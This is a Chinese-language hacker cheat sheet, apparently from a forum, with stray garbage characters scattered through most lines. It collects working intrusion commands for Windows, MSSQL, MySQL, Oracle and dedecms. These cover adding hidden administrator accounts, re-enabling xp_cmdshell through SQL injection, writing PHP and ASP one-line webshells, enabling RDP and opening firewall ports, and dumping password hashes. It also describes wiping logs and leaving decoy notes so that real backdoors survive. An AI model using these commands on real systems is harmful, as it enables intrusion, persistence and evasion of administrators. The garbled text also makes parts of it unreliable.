- A# l" d" U3 G$ W. E1.net user administrator /passwordreq:no
( n3 \6 a9 V: d$ d' ^这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了" B6 Y# Q( r4 s+ O
2.比较巧妙的建克隆号的步骤
/ J$ E8 e" V( X1 q; A7 G先建一个user的用户 x, |0 a# g+ \& F0 }3 r- B
然后导出注册表。然后在计算机管理里删掉8 J8 Q' \4 c8 @4 {6 ^
在导入,在添加为管理员组; O* J0 F* Q! a1 _/ {
3.查radmin密码7 u/ }4 |. F2 `1 U* B
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg- {0 @1 c; w( k
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
* Q* |" D- h) E建立一个"services.exe"的项
) }3 T, J4 q, o1 M/ M再在其下面建立(字符串值)
5 U: ]: u# W0 Z+ X l, t键值为mu ma的全路径& P' S, R( V, [) V; c& p6 U! @
5.runas /user:guest cmd3 x- F6 {# g& w/ [: v' u+ a2 a
测试用户权限!0 v6 a/ b5 z2 z+ J3 [
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?. u5 S( | y5 a3 \0 E: T4 y
7.入侵后漏洞修补、痕迹清理,后门置放: c+ Y) b6 l5 [& B$ w1 y
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门" i7 n m; m# }, O, s j# X" `1 z
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c) o+ _ m8 |1 u
1 t+ p( g9 L9 s3 ^* v3 _
for example: L. H# N; c$ B- m
% j" X4 C, D' d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
4 M0 \# M; ^: D6 a/ T: U0 G3 M( B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
% f& R; l s3 L6 D3 Z T
4 z6 Q' h2 ]( {4 k0 }- e9:MSSQL SERVER 2005默认把xpcmdshell 给ON了& K, O" z N, M! s- F: {0 L$ v a
如果要启用的话就必须把他加到高级用户模式, i: t7 n L4 ~
可以直接在注入点那里直接注入1 i0 I- }) Y7 l2 ~# g) M% q
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--) }4 P) L" {" S- R) a
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
- d% D( }! o6 R/ K或者
6 ?# `, m0 E5 q; A9 bsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' J# A0 w- p P4 r0 Q' q2 L来恢复cmdshell。) Q2 p* x K9 ]/ j. G
- L3 D8 q+ k# L. c分析器
. G# m0 I1 a S3 p( \. V/ jEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--: G$ R7 c' h( J, t6 d/ t+ V# V
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 h. _2 J- C- E
10.xp_cmdshell新的恢复办法1 Z L+ e. ?8 K# d+ Y) b' k! S0 g
xp_cmdshell新的恢复办法5 ~9 ^) _" n4 h
扩展储存过程被删除以后可以有很简单的办法恢复:
. F% G4 j( [/ b( ~: W/ E* v删除' y9 K P! _% w) G% U
drop procedure sp_addextendedproc9 u6 \9 {, a& L" A" Z' N
drop procedure sp_oacreate
1 L" p( r5 {0 }exec sp_dropextendedproc 'xp_cmdshell'% q- B+ n3 z' W8 F9 { k
+ ^0 Q/ q+ K0 Z" T1 H5 a
恢复- n0 [/ ~+ B+ m# z0 e W( R3 I
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
- o4 x% A9 W [7 Wdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
9 `) }$ b, o% b. k [* [
( b2 i# `$ ^+ s% M, k3 g% {这样可以直接恢复,不用去管sp_addextendedproc是不是存在9 ~+ \+ U' L+ m
1 D ` z' E4 v, F3 R% A+ E-----------------------------# }% E9 M+ H1 T
2 F! n$ ^& n; U- B8 U( @% U! m) W* _删除扩展存储过过程xp_cmdshell的语句: P2 c$ @% k( t0 [# L* o
exec sp_dropextendedproc 'xp_cmdshell'9 d2 [$ A8 {; l v3 B# A& H
# n$ k% B8 D, W( w+ m2 v恢复cmdshell的sql语句
. A" O. n9 L: {7 \4 Bexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'3 h- D$ E" [1 n( ^) ^
2 S- E( D( n% B/ T9 m0 v
7 K$ N v9 W) D5 x4 H
开启cmdshell的sql语句: Y9 O/ B: a+ w& T8 O9 \
" |) a3 o) f9 p/ v8 n aexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
2 H [. r$ D* l2 ~* |( I
9 K5 r9 j. Y6 @" l' k3 N% Q0 y判断存储扩展是否存在
3 c- T8 z/ }/ F* }6 E2 oselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
% t: D% z; ?* u1 q) _2 |7 ]返回结果为1就ok* i6 A0 ? ~6 C
: w; Z0 m" j, f. s' e恢复xp_cmdshell
- s2 w9 R1 k+ }: |1 @# V& A1 m9 Iexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. x* \; X0 ~! v! l: H返回结果为1就ok
4 b8 S3 j, s( R- R) S( l6 u8 \2 Z! r, D0 K: `6 r
否则上传xplog7.0.dll
# C# f P8 P) h2 Y/ S( d/ m% hexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'4 U" s) _: t; W. y# K; i
, ]% m) \1 Y! Z. O堵上cmdshell的sql语句. o% d, T$ f" s2 u* W4 F
sp_dropextendedproc "xp_cmdshel
( g$ w/ I9 `) U; ^- c-------------------------8 ^" o1 j9 H2 t9 ~
清除3389的登录记录用一条系统自带的命令:4 x9 ?* K' I F
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
! u- M+ S& x9 P0 V: E7 r
$ k4 l/ ~3 h6 L* L然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件( [) M6 n+ ]3 U# Z( f- R
在 mysql里查看当前用户的权限0 |& r, ] l8 \% V e' E+ \
show grants for / A5 i; H- k: \% m5 e
# ~: L: n7 _- n
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 z6 A3 i; ?. d0 @1 x0 [/ D. H* G# |, F+ T, [( Y
6 |$ ?& X* h9 u2 f2 j: WCreate USER 'itpro'@'%' IDENTIFIED BY '123';
/ p$ T0 v2 n0 p+ v& V+ l/ b
* `" b/ K8 I% ?6 m0 W$ h6 kGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION Q0 {) `# n: j8 D
6 ]' |7 N6 ~% X+ I8 E* E, qMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; X2 W2 u# E9 C5 Q% F8 s, f, m
& k- X( I' u0 l0 S+ Q' `
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
! u1 h. C4 X' X2 S1 O* l, {5 T6 \2 n& a n! G0 N' t
搞完事记得删除脚印哟。
) _& a- w6 x( }! |% J. W F6 K8 Z# s4 j9 B1 y: q# x
Drop USER 'itpro'@'%';
2 Z" r3 b, \ h4 p$ s0 c( V! D( c/ \; p: g7 i$ h f0 k7 c
Drop DATABASE IF EXISTS `itpro` ;( I$ M( ]& ~% c; i6 k. r
/ @. o5 W9 g3 B当前用户获取system权限
5 \ G4 \" @# }sc Create SuperCMD binPath= "cmd /K start" type= own type= interact2 z8 z/ N& C0 U/ m; }+ l
sc start SuperCMD i! _* c/ y) o( Q& H
程序代码% @1 s- u! M2 D' V8 @/ B
<SCRIPT LANGUAGE="VBScript">
0 }- j r, K( B7 M1 M0 Fset wsnetwork=CreateObject("WSCRIPT.NETWORK")
) F3 l- ^1 g) f3 E4 }os="WinNT://"&wsnetwork.ComputerName6 z# i c. f) Y/ ^4 J8 _" t& L+ f9 C
Set ob=GetObject(os)
9 U6 b9 J6 E _! E# @Set oe=GetObject(os&"/Administrators,group")
, D- q# c7 e! j- f6 I; \3 a/ ^Set od=ob.Create("user","nosec")
* ~/ L* `4 ~' D+ W8 F# mod.SetPassword "123456abc!@#"- u& u/ O3 W, R6 ~& O! E$ c
od.SetInfo
4 a& `- b5 d4 rSet of=GetObject(os&"/nosec",user)
0 q R) l! z+ J9 @( {& {oe.add os&"/nosec"
* S+ ]& {5 ^: C5 T& Q</Script>0 A/ _% `. Q. f- W7 s) {& j
<script language=javascript>window.close();</script>: x C5 o! n: k# T! Q w R i
k7 q2 ^) |/ C( m( N2 S- ?
8 }+ u3 V* o" v1 B) \" b7 t! K) p: Y5 d
$ ?4 k! Z4 Q& d+ T$ u, L" L( v `9 @
突破验证码限制入后台拿shell& \# n: j5 a! Z* V
程序代码/ }# t+ X5 Q( N5 B- j& m
REGEDIT4 ! d, Q; `/ A0 e6 p' @
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ) ]6 _1 u, I9 o5 T4 l, T
"BlockXBM"=dword:00000000
1 M; k6 a; ]+ u- B+ V7 d, ?) J/ O$ F' ]0 X r6 o; `
保存为code.reg,导入注册表,重器IE6 [, w! Q- |1 w: |2 e* o6 O( H
就可以了
. C& b' D+ Q' C1 o9 `union写马2 d3 b7 T/ {2 L8 t9 I0 Q
程序代码
0 i' O4 l' T* k' B3 r3 ~www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
* I$ G' V/ |$ O( o
! T4 Y. b$ y$ w3 i$ z) _应用在dedecms注射漏洞上,无后台写马
, r% M2 r/ \" L9 w# W6 Y4 Wdedecms后台,无文件管理器,没有outfile权限的时候2 Y3 a- V- m0 ^+ v
在插件管理-病毒扫描里% X; C* R; Z0 o! q
写一句话进include/config_hand.php里
3 W1 P" m& x+ u; i" c1 H程序代码% W9 L9 G; [ N% h( |% F
>';?><?php @eval($_POST[cmd]);?>
9 @. |6 L$ E" z, d. c/ C/ D# D7 t! Y7 m) B
% H% I0 _- s3 `9 O如上格式
, U5 Q5 B! E. a# T% Z7 s6 b$ E" T; b# L9 n$ ]4 x8 l
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
7 a& x7 |/ C$ V) e- J4 e程序代码1 y: K" C a# P3 O, v
select username,password from dba_users;
+ F# m: s4 \: R5 a. n4 G! ]7 z' Y& Y3 B3 A% l
" a# M1 [, F7 W& R8 P' Z
mysql远程连接用户
0 P1 E& P4 Z+ E# G# z6 L程序代码
/ @) h: z3 ~ y4 \2 O2 m- L, u$ U7 p4 E. c/ S5 x7 x8 T- T
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';/ Q. I) m1 S7 c/ p0 K1 v
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION9 t$ l4 X1 K6 G1 r3 l3 X
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
/ X$ w) |5 p$ d2 ~MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
+ C+ y' z* ]- F
) K& ^; b0 p V# M& {* L5 X
% |% l: {5 e( ?; M: Q
! ?2 m2 ~7 b& `3 O" t5 M) O% v3 \ l a4 L8 e9 }1 F: _7 h) a
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/ R: J, ]/ T e
. g, W. T: Z- S D
1.查询终端端口0 V) f9 d6 s/ m
/ u' L) Z1 s6 W7 N/ s( o& `. gxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber4 @6 {' E1 `9 Y d5 x
) n- h8 x+ c0 d( M% B2 k! T
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
8 v: T7 N) l3 b ftype tsp.reg
" R# T: f' ]) x- q3 J1 q% G+ F: B7 @" s6 Z7 _) X
2.开启XP&2003终端服务8 a; }2 ^' Q2 u6 P. b
& L0 c, c, _ O& ?: X- ? R
% U e; J2 Z) K }8 qREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
1 n/ a' I! U: w$ }6 T9 a1 z, a
# X4 ?1 |2 ?+ `+ L# E+ N4 W( q" Q! B
+ D- |3 |2 I$ f% S T* GREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f8 w# A! c0 }- n9 [
0 i; y* q- y- U! N5 R6 j/ o0 G& L3.更改终端端口为20008(0x4E28)
}9 `0 Y" u+ J& _5 |% s3 v" S2 {/ c2 Y+ p
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ y; M) g+ Q: J( `% d3 |
, n5 N: G% g- w. CREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f9 M% l- k. J5 i5 {! j- F9 q
# [9 s! j: I; A t. a
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制" o) t; P: {6 D% V$ F
3 S; d( u8 l% d# P; w6 n
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f* X. n( d8 q% C# F6 [& b
8 x# F7 a$ c/ [6 {( a7 r! }
9 q' V+ {% Y2 T o5.开启Win2000的终端,端口为3389(需重启)! ~9 F! N3 h/ z$ \. w
6 \. Q. k3 N* I& f* uecho Windows Registry Editor Version 5.00 >2000.reg : f4 c8 |1 `9 N, Y0 c- `
echo. >>2000.reg
{5 d! w% R+ J$ kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
6 D% r, E G" L* } p& D" Secho "Enabled"="0" >>2000.reg
0 C; U2 E/ Y8 d& a- v& K# B8 hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
' @4 Z5 y* G# Z" ~: j! u. S# Techo "ShutdownWithoutLogon"="0" >>2000.reg
' [4 t' v* M* L# {echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
) c2 u5 m5 T% L) t2 kecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
0 i( [/ \3 `( u& p o" pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
" X& z+ Q. R, t% q: q! Jecho "TSEnabled"=dword:00000001 >>2000.reg
7 p( o" U: d- secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
4 Q; f3 ~0 w) y8 |* R% B [+ jecho "Start"=dword:00000002 >>2000.reg
+ Y9 E! A" {* j4 ]" C9 | Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
5 K: r2 |" v$ o! l1 J) iecho "Start"=dword:00000002 >>2000.reg
: L% v* S( _+ C" k' N4 d8 qecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 7 }- }7 A! I% z! g; f7 @
echo "Hotkey"="1" >>2000.reg
% j- K7 h) u' n- ~5 C. \3 ] k7 ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
( H! a; i8 j M+ gecho "ortNumber"=dword:00000D3D >>2000.reg
1 h6 j) b8 b6 _6 \ s! y& jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg % _: P% ~. ^+ c+ b% T9 i
echo "ortNumber"=dword:00000D3D >>2000.reg
8 ~+ p& o4 l* g5 j: A+ n& @
/ I- f [! @8 K$ A& Z3 \; ]; H% @6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
! `. ^) p: | q+ |4 r/ m) k X- |) c; l
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf- o4 N! t: V' W
(set inf=InstallHinfSection DefaultInstall)
# R1 M# d i. J8 Q+ o# recho signature=$chicago$ >> restart.inf
V6 v( M( E# {echo [defaultinstall] >> restart.inf! l9 {4 }2 c7 @& m. ~
rundll32 setupapi,%inf% 1 %temp%\restart.inf
$ k/ g8 U' [" h* Y' h) ]' P. \
% ~3 Q8 C# |3 d/ l: p% C! Y- A, Q, h
7.禁用TCP/IP端口筛选 (需重启)1 o' p" S% y8 i; C
" E. u1 T8 b C2 j2 O
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
0 ]' K) o# C9 F M
1 G& t; T R& I8.终端超出最大连接数时可用下面的命令来连接
4 Q) M: b% D" g$ l% T9 x% |4 d8 J8 a, W) P; `$ H/ s
mstsc /v:ip:3389 /console9 s, y8 \1 U( L9 S
" A% X2 a. l+ ~
9.调整NTFS分区权限! n; Y( |: T" {% u, ^
& b* l. H( } g
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
0 @) d" U- H, b, V+ r/ z6 U( [+ i& m6 T- k
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)6 O+ E' d( V' [
7 |" r5 _1 \) a------------------------------------------------------( U/ D5 q# k: T2 D5 w1 w( o
3389.vbs 5 _3 X9 Z0 O" n4 l* i
On Error Resume Next
5 t0 }5 r& d* b7 O' \const HKEY_LOCAL_MACHINE = &H80000002
9 z" \. S' A7 r3 nstrComputer = "."6 Y. o( _- O1 t% O
Set StdOut = WScript.StdOut
# R& u- p2 f, k/ A' dSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_" Z: {, a. y* L% X3 I' T
strComputer & "\root\default:StdRegProv")& E5 e ?% e/ r9 E$ L8 o# z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) G6 W" E2 ]/ e0 Foreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
+ Y! {* }6 f* ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
& u6 m; C* i+ s7 n Q% aoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
, I" |# o+ y% Q' Y, ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
8 j* B' ?- l, R& f8 l8 {+ a1 m& zstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 {/ \8 J5 Q' h- V6 ^' L
strValueName = "fDenyTSConnections"% s/ Y. o/ {5 D1 M6 u. ]
dwValue = 0' s) h8 w7 W, [
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue k$ F& B5 `+ n& y& J+ _ C p
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"- K2 t" T- Z7 o! N8 [( R! P
strValueName = "ortNumber"! n8 r" D/ K: K
dwValue = 3389
/ J3 g5 c7 {( poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue5 ~ z( J/ r" A- N+ K6 a; s
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
" f! d1 V( T) D& l. J2 C/ k2 hstrValueName = "ortNumber"0 q# ^4 m0 ?7 u5 K8 z
dwValue = 33894 L, W2 P1 D4 E0 O8 D) B0 u7 R# |
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 ]# q) M5 I" m3 b! `% ~
Set R = CreateObject("WScript.Shell") 9 ?* {/ }* n" I
R.run("Shutdown.exe -f -r -t 0")
, G b* N" v1 ?$ i+ {& S+ x: J/ f5 x; J/ d
删除awgina.dll的注册表键值! t* U& ]6 F( P, \0 J! |7 i
程序代码, t, B$ Q, p( j0 U+ A
' F& T/ q0 B3 [* ireg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
9 ]5 a. T) g/ |, `+ D8 Y0 Q; m, Z1 Q% Y$ _( A
Z' g; \' T6 E' ~
V* j* i( s* I; r
0 L, D1 c2 a8 h程序代码
; |/ O" h9 O/ G& c. q( @2 k; G% z0 xHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
^5 F2 L# [3 o! i2 l# _& e! f* \8 U8 g% O# ?% D: [% o* {
设置为1,关闭LM Hash% B, f0 d' C* G0 X' w/ T- E; |
0 Z! |& M# F* R7 M) s+ _/ Y数据库安全:入侵Oracle数据库常用操作命令* i& p4 k6 w; I6 L. ?" P; F
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。2 t) _3 R. H+ I/ \ z3 z
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
# ?0 D% u, l( z* u" Y2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;% v t4 e1 F/ D+ q$ r0 b; \
3、SQL>connect / as sysdba ;(as sysoper)或/ f- k: N% j2 t
connect internal/oracle AS SYSDBA ;(scott/tiger)
- r" H2 c/ f. u2 m% qconn sys/change_on_install as sysdba;
( | F) S/ u6 k4 s" `: d* r4、SQL>startup; 启动数据库实例( W ?7 w5 k5 w/ P% j! |
5、查看当前的所有数据库: select * from v$database;
) m; E! ^; e/ A: F2 r1 R% vselect name from v$database;
, C1 Q7 l w0 p5 ~1 s, g6、desc v$databases; 查看数据库结构字段" O, s9 D; G6 q$ ?7 c9 J4 N9 v+ B U
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:4 N7 h1 g) i: [0 t2 K% P0 C
SQL>select * from V_$PWFILE_USERS;. r0 R$ ^+ j W( u+ [0 h$ t
Show user;查看当前数据库连接用户! ? e9 P3 R, b1 U, s6 B6 ]3 ~
8、进入test数据库:database test;
G2 n3 [ L' Y1 R. q9、查看所有的数据库实例:select * from v$instance;' x% t4 n4 K4 F# ]2 f# G
如:ora9i
7 M) T$ I0 f. ^5 {10、查看当前库的所有数据表:$ U! j' m, H/ y s- E" O
SQL> select TABLE_NAME from all_tables;$ a+ k1 H ~& l7 W( D, l
select * from all_tables;/ _% z2 Q4 Z- j" j# b( g+ Z
SQL> select table_name from all_tables where table_name like '%u%';. K$ d$ B% d W+ F3 w5 S
TABLE_NAME
! _6 z7 S9 e- l6 p N, \------------------------------
/ G) Y3 \1 _- c. d' H& o. Q6 v_default_auditing_options_
9 O; b/ T0 s9 a) r' q; N11、查看表结构:desc all_tables;
) P% a3 {& j4 o0 L% m12、显示CQI.T_BBS_XUSER的所有字段结构:
% x; ^, K7 ]7 g2 Hdesc CQI.T_BBS_XUSER;
" a, z2 H% m. O( e2 P4 D1 A2 o13、获得CQI.T_BBS_XUSER表中的记录:
$ s, V7 K) M( h* X& z+ Pselect * from CQI.T_BBS_XUSER;
; \' I% W+ Y/ p. q( K14、增加数据库用户:(test11/test)( }, ]2 d3 l3 U) n: @
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
( D. F! P( Y5 M ~( o7 y15、用户授权:
1 j" P0 c( u$ ]$ jgrant connect,resource,dba to test11;
5 G# c N# ?7 ?grant sysdba to test11;
7 G0 w$ V- V8 ^! [commit;
% ~! R8 k7 a. n8 p! n1 i16、更改数据库用户的密码:(将sys与system的密码改为test.)
% @* M0 m/ E3 |alter user sys indentified by test;
& C2 ^* `" k0 M+ C) o: balter user system indentified by test; q& g6 m# U) A& \( n9 _9 v& ~. a
% e6 k! ]! U% U5 g( Q- v
applicationContext-util.xml
8 l' u K6 z& L6 f3 qapplicationContext.xml: n3 i! s& h, P5 ~+ ]# q' D
struts-config.xml
6 {) L" @4 h3 z- z* oweb.xml
( o) d) o% D4 V% A) _& ^, w/ Zserver.xml
3 H0 w- q6 Z6 W9 v3 H* ctomcat-users.xml
$ q3 S# Q+ o V9 ?, k/ Z2 shibernate.cfg.xml: ^8 ]) M; k. P. C
database_pool_config.xml
6 E5 c' D. ^5 ]! [/ z
3 n. H0 `* P8 B- A4 a; a* a+ H! x3 K5 x7 h
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置# h6 w5 N6 p! u* K4 G; I; p+ T( f
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
" D/ m+ o! Q$ t: H6 t5 t# a: \\WEB-INF\struts-config.xml 文件目录结构- D) H2 w1 m! J; @. {& K# g7 ~3 x
) M8 D% e) H6 S! C/ @ pspring.properties 里边包含hibernate.cfg.xml的名称
) G* ]4 I3 J! N
6 Q3 V" z' m% p. ?4 Y
; t9 H$ {. J, l+ w( c0 C, k1 ]C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml- N; ?1 B8 x1 i7 q" e7 n* |2 o5 D
6 X# t R0 I0 K如果都找不到 那就看看class文件吧。。5 T) f1 {! g$ Q
4 w8 x" l& E J2 f+ S. e# X测试1:, t, c0 _/ g4 `" x; g2 \
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
3 g1 _! p2 K+ N" `! S& r! w# \
. z6 s9 P& x- b) _! l4 R% [9 t测试2:
0 q( r* |# d! @$ D# H; i- |8 g& b. e$ |8 t/ p) q
create table dirs(paths varchar(100),paths1 varchar(100), id int)! i$ E. p7 z3 l2 ]
- S' {6 {, C% P" P! ~delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--8 q- Y: T4 P8 v v- d( W( e
* P* R; F7 v0 f' |' X
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t13 w& k3 O/ u% J8 e9 C8 m7 e
J- J! I9 S9 t; L. S
查看虚拟机中的共享文件:
+ [# L! a7 j* E0 {% q$ S0 v在虚拟机中的cmd中执行
2 L- W2 |9 A# w I! {\\.host\Shared Folders4 J5 c) m- `* T* J2 h0 _- D
0 s+ d: q h4 V. B8 J6 I/ Zcmdshell下找终端的技巧2 i6 Q4 F: X8 G. i8 n& p
找终端: 9 v! }9 Z$ ~4 U, D
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
u' M; u) {9 ]: N 而终端所对应的服务名为:TermService
6 O3 E/ |: N, a' B j7 Q第二步:用netstat -ano命令,列出所有端口对应的PID值!
G I2 B6 K/ A" @, F$ }' n( Y 找到PID值所对应的端口6 z, W) {8 T) n2 ^
. `4 `5 O7 s* O) [, @6 i; @ s1 Z
查询sql server 2005中的密码hash
' k; o* \) |4 K% m8 b5 F% p& U) MSELECT password_hash FROM sys.sql_logins where name='sa'9 b6 D+ ^0 }! R; n$ O: L# @7 ~) L9 P
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
* _1 K' a) H9 c* s/ k$ l1 _4 C0 Vaccess中导出shell6 ]3 v4 O) I$ ~* @5 P8 W7 g: d
6 o; C0 g S D+ |# M, T7 c. d中文版本操作系统中针对mysql添加用户完整代码:
+ J' h8 q n" [# t6 S4 o
& f& L, _3 A& B5 \) Duse test;
1 M* |2 z# V# v0 P/ k) o, M' B* j; Rcreate table a (cmd text);
# q: S8 \3 S& T% |" c9 Cinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
